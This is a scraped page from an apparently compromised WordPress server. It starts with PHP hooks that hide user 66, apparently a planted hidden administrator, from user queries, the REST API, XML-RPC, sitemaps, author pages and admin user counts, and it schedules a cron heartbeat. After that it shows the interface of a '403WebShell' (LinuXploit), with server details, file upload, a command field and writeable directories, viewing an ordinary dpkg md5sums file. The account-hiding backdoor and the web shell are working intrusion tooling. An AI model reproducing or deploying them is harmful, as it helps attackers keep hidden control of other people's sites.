add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/libauthen-sasl-perl.md5sums
e79673c6022619b607464a7578c71cd4  usr/share/doc/libauthen-sasl-perl/api.txt
b60b6384733be1abbb6dff1081818a39  usr/share/doc/libauthen-sasl-perl/changelog.Debian.gz
c1beff36474c01bb940a4951d5338232  usr/share/doc/libauthen-sasl-perl/copyright
7fdf0e016fffc4255a1acb975aaa58ba  usr/share/doc/libauthen-sasl-perl/examples/compat_pl
7062e230cac2d664d24f0e6d7404140e  usr/share/doc/libauthen-sasl-perl/examples/example_pl
ea90d364dc7f910564f674bcfbd45376  usr/share/man/man3/Authen::SASL.3pm.gz
b591da74f1acb00ffb835009efb08ab8  usr/share/man/man3/Authen::SASL::Perl.3pm.gz
7e943ef832fd88f9fdea36503953de8e  usr/share/man/man3/Authen::SASL::Perl::ANONYMOUS.3pm.gz
6397726dbc9d7b3a3f847b72ce7a6b85  usr/share/man/man3/Authen::SASL::Perl::CRAM_MD5.3pm.gz
d70b03af4307971842fc08fedb332879  usr/share/man/man3/Authen::SASL::Perl::DIGEST_MD5.3pm.gz
603a548ea8ba6a9a3918d3718ab681b7  usr/share/man/man3/Authen::SASL::Perl::EXTERNAL.3pm.gz
d9bb3a46c6aa944336419c53b0254ab0  usr/share/man/man3/Authen::SASL::Perl::GSSAPI.3pm.gz
bb5935011a0a8c096e5e5e97152b44f5  usr/share/man/man3/Authen::SASL::Perl::LOGIN.3pm.gz
7d397150d8b0ec715ecbf054ad991f3d  usr/share/man/man3/Authen::SASL::Perl::PLAIN.3pm.gz
1ed3737ab588e3cf0f2e39a629f4f356  usr/share/perl5/Authen/SASL.pm
7593961782686f833cb39758956cd8f2  usr/share/perl5/Authen/SASL.pod
43110e868f01579e76e36a4af9f5c675  usr/share/perl5/Authen/SASL/CRAM_MD5.pm
28139d95fe43e72765db45d954773e33  usr/share/perl5/Authen/SASL/EXTERNAL.pm
ef3f146c3649323a9ae49a7f8203269c  usr/share/perl5/Authen/SASL/Perl.pm
93b4ba4ce4520c7253116fd1c6cb9c93  usr/share/perl5/Authen/SASL/Perl.pod
7cc5ebe5de2369f63cddd210e83d7d82  usr/share/perl5/Authen/SASL/Perl/ANONYMOUS.pm
d94846a00662e8456154262372679532  usr/share/perl5/Authen/SASL/Perl/CRAM_MD5.pm
2b08b8922b7740833ebb338bd3727b33  usr/share/perl5/Authen/SASL/Perl/DIGEST_MD5.pm
a55252f7333f6d870ae661e62ca34eb0  usr/share/perl5/Authen/SASL/Perl/EXTERNAL.pm
00ec76a8db3e72b948ed69e2b90d9cc2  usr/share/perl5/Authen/SASL/Perl/GSSAPI.pm
eb231a82116918e26163a595c60d04bb  usr/share/perl5/Authen/SASL/Perl/LOGIN.pm
05d468dcfe670b421cbd8f8240fdadf5  usr/share/perl5/Authen/SASL/Perl/PLAIN.pm

Youez - 2016 - github.com/yon3zu
LinuXploit